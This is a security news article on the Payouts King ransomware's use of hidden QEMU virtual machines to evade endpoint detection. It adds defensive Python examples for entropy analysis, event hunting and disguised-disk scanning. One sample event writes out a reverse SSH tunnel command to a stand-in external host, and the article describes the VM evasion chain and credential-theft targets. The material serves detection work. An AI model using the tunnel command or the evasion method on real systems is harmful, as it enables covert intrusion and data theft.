PROBABLYPWNED
Malware | April 19, 2026 | 4 min read

Payouts King Ransomware Hides Inside QEMU VMs to Dodge Endpoint Security

New ransomware operation linked to ex-BlackBasta affiliates runs Alpine Linux VMs on compromised hosts. Endpoint tools can't see inside the VM boundary.

James Rivera

A new ransomware operation called Payouts King is deploying hidden virtual machines on compromised systems to evade endpoint detection. The technique exploits a fundamental limitation: security software running on a host cannot see the processes, files or memory inside a guest VM. It sees only the emulator process that contains them.

Sophos researchers documented the campaign, linking it to former BlackBasta affiliates based on shared tactics. The group uses QEMU, an open-source machine emulator and virtualizer, to run Alpine Linux instances that stay invisible to host-based security tools.

How the QEMU Evasion Works

The attack chain is straightforward but effective. After gaining initial access — typically through exposed VPNs or social engineering — the attackers deploy a QEMU installation package containing a pre-configured Alpine Linux VM image.

A scheduled task named "TPMProfiler" launches the VM with SYSTEM privileges. The virtual disk files are disguised as databases and DLLs to avoid raising suspicion during casual inspection. Once running, the VM establishes reverse SSH tunnels back to attacker infrastructure.

From inside the VM, attackers deploy their actual tooling: AdaptixC2 for command and control, Chisel for tunneling, BusyBox for utility operations, and Rclone for data exfiltration. All of this activity occurs within the VM boundary. EDR, antivirus and behavioral detection on the Windows host see a single QEMU process; the guest's processes, binaries and memory are opaque to them, so the usual tool-based detections for these utilities never fire.

The encryption itself uses AES-256 in CTR mode with RSA-4096 key wrapping. For larger files the encryptor is intermittent: it encrypts only selected portions of each file, which is faster and still leaves the data unusable, but also means large stretches of plaintext survive inside the encrypted file.
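Intermittent encryption leaves a recognisable fingerprint: windows of ciphertext-like entropy alternating with readable ones. The following is an added Python example, not code from the article or from the ransomware, that classifies a file body by its per-window entropy profile. The sample document and the encrypted variants are constructed; a seeded PRNG stream stands in for AES-CTR keystream output purely so the entropy profile matches (it is not encryption). The 4 KiB window and the 7.5 bits-per-byte threshold are assumptions, not the encryptor's real parameters, and the page does not say which portions Payouts King encrypts, so the alternating-window layout here is one model of "encrypting only portions".

```python
import math
import random

WINDOW = 4096   # analysis window in bytes; an assumption, not the encryptor's block size


def shannon_entropy(data):
    """Bits per byte: roughly 4-5 for English text, close to 8.0 for ciphertext."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def window_entropies(data, window=WINDOW):
    return [shannon_entropy(data[i:i + window]) for i in range(0, len(data), window)]


def classify(data, window=WINDOW, high=7.5):
    """Label a file body by the shape of its entropy profile.

    plaintext    - no window looks like ciphertext
    encrypted    - every window does (caveat: compressed or packed files look the same)
    intermittent - ciphertext-like windows alternate with readable ones
    mixed        - a single high-entropy region (header-only encryption, an embedded blob)
    """
    hot = [e >= high for e in window_entropies(data, window)]
    if not any(hot):
        return "plaintext"
    if all(hot):
        return "encrypted"
    flips = sum(1 for a, b in zip(hot, hot[1:]) if a != b)
    return "intermittent" if flips >= 2 else "mixed"


# --- constructed sample data (not real victim files) ----------------------

def sample_document(windows=8, window=WINDOW):
    """A fake spreadsheet export: repetitive, low-entropy text."""
    line = b"Quarterly figures, cost centre 4411, approved by finance on Monday.\n"
    return (line * (windows * window // len(line) + 1))[: windows * window]


def simulate_intermittent(data, window=WINDOW, every=2, seed=1):
    """Overwrite every `every`-th window with seeded PRNG bytes.

    The PRNG only stands in for CTR keystream output so that the entropy
    profile matches real intermittent encryption; no cipher or key is involved.
    """
    rng = random.Random(seed)
    out = bytearray(data)
    for idx, start in enumerate(range(0, len(data), window)):
        if idx % every == 0:
            end = min(start + window, len(data))
            out[start:end] = rng.randbytes(end - start)
    return bytes(out)


def simulate_full(data, seed=1):
    """Same stand-in applied to the whole body, i.e. conventional full-file encryption."""
    return random.Random(seed).randbytes(len(data))


if __name__ == "__main__":
    doc = sample_document()
    for label, body in (("original", doc),
                        ("intermittent", simulate_intermittent(doc)),
                        ("full", simulate_full(doc))):
        print(label, classify(body), [round(e, 2) for e in window_entropies(body)])
```

The alternation count is what separates intermittent encryption from a merely high-entropy file: a ZIP or a JPEG scores "encrypted" and needs a magic-byte check to rule out, whereas a body that flips between readable and random every few kilobytes has very few innocent explanations.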

Connection to BlackBasta

Zscaler researchers identified operational overlaps with BlackBasta, one of the more prolific ransomware operations of recent years. The similarities include:

  • Spam bombing campaigns to overwhelm targets
  • Microsoft Teams phishing to deliver initial payloads
  • Abuse of Quick Assist for unauthorized remote access
  • Credential harvesting focused on NTDS.dit and SAM hives

BlackBasta's recent operational disruptions may have pushed affiliates toward new brands. Payouts King appears to be one such rebranding effort, carrying forward proven tactics while adding the VM evasion layer.

Initial Access Vectors

Sophos documented two distinct campaign tracks:

STAC4713 (active since November 2025): Targets exposed SonicWall VPNs, exploits a SolarWinds Web Help Desk vulnerability (CVE-2025-26399), and compromises Cisco SSL VPN deployments.

STAC3725 (active since February 2026): Exploits CitrixBleed 2 (CVE-2025-5777) to compromise NetScaler devices, then deploys ScreenConnect for persistence before dropping the QEMU package.

Both tracks converge on the same post-exploitation methodology: establish VM-based infrastructure, harvest credentials, exfiltrate data, then encrypt.

Detection Guidance

The VM technique creates a visibility gap, but it's not undetectable. Sophos recommends monitoring for:

  • Unauthorized QEMU installations — the emulator is legitimate software but unusual on most endpoints
  • Scheduled tasks running with SYSTEM privileges — especially those with hardware-sounding names like "TPMProfiler"
  • SSH port forwarding activity — reverse tunnels are a hallmark of this technique
  • Outbound SSH on non-standard ports — attackers often avoid port 22 to blend in
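The four checks above, and the attack chain from the "How the QEMU Evasion Works" section, translate directly into hunt logic over host telemetry. The following is an added Python example, not Sophos's or the article's code: it runs the checks over a handful of constructed, Sysmon-style events (process creation, network connection, scheduled-task creation). The Event schema, the file paths, the task name reuse and the 203.0.113.45 address are all this example's own assumptions. One deliberate generalisation: because the SSH client in this campaign runs inside the guest, the host never sees an ssh.exe with a -R flag; it sees the QEMU process opening the socket. The fourth rule therefore flags any external egress from the emulator process rather than only non-22 SSH.

```python
import ipaddress
import re
from dataclasses import dataclass


@dataclass
class Event:
    """Normalised host event. Field names are this example's own; map your Sysmon
    (EID 1 process, EID 3 network) and Security 4698 (task created) fields onto them."""
    kind: str                 # "process", "network" or "task"
    image: str = ""           # full path of the executable
    command_line: str = ""
    run_as: str = ""          # task principal for "task" events
    task_name: str = ""
    dest_ip: str = ""
    dest_port: int = 0


QEMU_BIN = re.compile(r"(^|[\\/])qemu-(system-[\w-]+|img)(\.exe)?$", re.I)
SSH_BIN = re.compile(r"(^|[\\/])(ssh|plink)(\.exe)?$", re.I)
SSH_FORWARD = re.compile(r"(^|\s)-[RDL](?=\s|\d)")   # -R reverse, -L local, -D dynamic forward
VM_LAUNCH = re.compile(r"qemu|-drive\s|-hd[abcd]\s|-cdrom\s", re.I)
SYSTEM_PRINCIPALS = {"SYSTEM", "NT AUTHORITY\\SYSTEM", "S-1-5-18"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_external(ip):
    """True for anything outside RFC 1918, loopback and link-local.
    Done by hand rather than via is_global/is_private so that documentation
    ranges such as 203.0.113.0/24 count as external for the sample data."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def hunt(events):
    """Apply the checks from the guidance above; returns (rule, detail) pairs in event order."""
    findings = []
    for e in events:
        if e.kind == "process" and QEMU_BIN.search(e.image):
            # Check 1: the emulator itself is the anomaly on a typical endpoint
            findings.append(("qemu_process", e.image))
        elif e.kind == "task" and e.run_as.upper() in SYSTEM_PRINCIPALS and VM_LAUNCH.search(e.command_line):
            # Check 2: a SYSTEM-level scheduled task whose action launches a VM
            findings.append(("system_task_launches_vm", e.task_name))
        elif e.kind == "process" and SSH_BIN.search(e.image) and SSH_FORWARD.search(e.command_line):
            # Check 3: a host-side SSH client asked to forward ports
            findings.append(("ssh_port_forward", e.command_line))
        elif e.kind == "network" and QEMU_BIN.search(e.image) and is_external(e.dest_ip):
            # Check 4 (generalised): every guest connection leaves the host as a socket
            # owned by the QEMU process, whatever port the guest's SSH client chose
            findings.append(("qemu_egress", "%s:%d" % (e.dest_ip, e.dest_port)))
    return findings


# --- constructed sample events (not real telemetry) -----------------------

QEMU = r"C:\ProgramData\Intel\qemu-system-x86_64.exe"
QEMU_CMD = (QEMU + r" -m 2048 -drive file=C:\ProgramData\Intel\tpmcache.db,format=raw"
            " -netdev user,id=n0 -device virtio-net,netdev=n0 -nographic")

SAMPLE_EVENTS = [
    Event("task", task_name="TPMProfiler", run_as="SYSTEM", command_line=QEMU_CMD),
    Event("process", image=QEMU, command_line=QEMU_CMD),
    Event("network", image=QEMU, dest_ip="203.0.113.45", dest_port=8443),
    Event("network", image=QEMU, dest_ip="10.20.30.40", dest_port=445),      # internal, ignored
    Event("process", image=r"C:\Windows\System32\OpenSSH\ssh.exe",
          command_line="ssh -N -R 2222:127.0.0.1:3389 -p 443 svc@203.0.113.45"),
    Event("process", image=r"C:\Windows\System32\svchost.exe", command_line="svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(rule, "->", detail)
```

The QEMU command line is worth keeping in every finding: the -drive argument names the disguised disk image on disk, and the -netdev argument tells you whether the guest uses QEMU's user-mode networking (all guest traffic then appears as the QEMU process's own sockets) or a TAP adapter.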

Network-level detection can catch what endpoint tools miss. The reverse SSH tunnels are long-lived outbound sessions to an address the organisation has never contacted, frequently on a port such as 443 where an SSH protocol banner (SSH-2.0-...) has no business appearing, and on the host they originate from the QEMU process rather than from any SSH client.

Why This Matters

VM-based evasion isn't new — Ragnar Locker used VirtualBox in 2020 for similar purposes. But the technique has matured. Modern implementations are lighter weight, harder to detect, and increasingly common as EDR coverage improves.

The ongoing evolution of ransomware tactics reflects a cat-and-mouse dynamic. As endpoint detection gets better at catching traditional malware behavior, attackers move their operations into spaces those tools can't reach. VMs are one such space. Encrypted traffic is another. And as we've seen with recent blockchain-based command and control, attackers are finding increasingly creative hiding spots.

For defenders, the takeaway is that endpoint protection alone isn't sufficient. Network monitoring, anomaly detection for process creation and scheduled tasks, and attention to the emulator process itself all matter more when attackers can operate from within an isolated VM. The emulator is the one thing the host still sees: its command line names the disk image and the network backend, and every connection the guest makes leaves the host as a socket owned by that process.

Indicators of Compromise

Organizations should search for:

  • QEMU binaries in unexpected locations
  • Scheduled tasks creating VM processes
  • Alpine Linux disk images disguised as .dll or .db files
  • Reverse SSH connections to external infrastructure
  • Credential access to NTDS.dit, SAM, and SYSTEM hives
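The disguised-disk-image indicator is easy to check without trusting file names at all, since a guest disk carries its own magic bytes (a qcow2 header, a VMDK header, a partition table or an ext superblock) whatever extension it was given. The following is an added Python example, not the article's or Sophos's tooling: it walks a directory, reads the first 2 KiB of anything named .dll, .exe or .db, and flags files whose content is a disk image rather than what the name claims. The sample files it writes into a temporary directory are constructed; the file names and the qcow2 and MBR stubs are assumptions for the demo.

```python
import os
import tempfile

# Magic bytes a QEMU guest disk exposes regardless of file name: (bytes, offset, label)
DISK_MAGICS = [
    (b"QFI\xfb", 0, "qcow2"),
    (b"KDMV", 0, "vmdk"),
    (b"EFI PART", 512, "gpt"),                # checked before "mbr": GPT disks also carry a protective MBR
    (b"\x53\xef", 1080, "ext-superblock"),    # ext2/3/4 on a partition-less raw image
    (b"\x55\xaa", 510, "mbr"),                # raw image with a boot sector / partition table
]

# What a file with this extension ought to start with
EXPECTED_HEADER = {
    ".dll": b"MZ",
    ".exe": b"MZ",
    ".db": b"SQLite format 3\x00",
}


def sniff_disk_image(head):
    """Return the disk-image type the first 2 KiB look like, or None."""
    for magic, offset, label in DISK_MAGICS:
        if head[offset:offset + len(magic)] == magic:
            return label
    return None


def check_file(path):
    """Flag a .dll/.exe/.db whose content is a disk image rather than what its name claims."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in EXPECTED_HEADER:
        return None
    with open(path, "rb") as f:
        head = f.read(2048)
    if head.startswith(EXPECTED_HEADER[ext]):
        return None                       # header agrees with the extension
    kind = sniff_disk_image(head)
    return (path, ext, kind) if kind else None


def scan(root):
    """Walk `root` and return sorted (path, extension, image_type) hits."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            hit = check_file(os.path.join(dirpath, name))
            if hit:
                hits.append(hit)
    return sorted(hits)


# --- constructed sample tree (not real artefacts) -------------------------

def build_sample_tree(root):
    """Write two disguised disk images and two legitimate look-alikes."""
    qcow2 = b"QFI\xfb" + b"\x00\x00\x00\x03" + b"\x00" * 4088          # qcow2 v3 header stub
    raw_mbr = b"\x00" * 510 + b"\x55\xaa" + b"\x00" * 1536               # empty boot sector
    files = {
        "tpmcache.db": qcow2,
        "wdiag.dll": raw_mbr,
        "settings.db": b"SQLite format 3\x00" + b"\x00" * 1024,
        "vcruntime.dll": b"MZ\x90\x00" + b"\x00" * 1024,
    }
    for name, body in files.items():
        with open(os.path.join(root, name), "wb") as f:
            f.write(body)


def demo():
    """Build the sample tree in a temp dir and return (name, kind) for each hit."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return [(os.path.basename(p), kind) for p, _, kind in scan(root)]


if __name__ == "__main__":
    print(demo())
```

The MBR signature on its own is a weak signal (any 2 KiB of random content hits 0x55AA at offset 510 about one time in 65,536), so in a real sweep pair it with a size floor; a bootable Alpine disk is tens of megabytes at least, and no real DLL or SQLite file that size lacks its own header.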

The supply chain attacks we've tracked recently show that initial access is getting easier for sophisticated groups. Once inside, techniques like VM-based evasion let them operate with little visibility from the host's defenders. Defense needs to account for both stages.
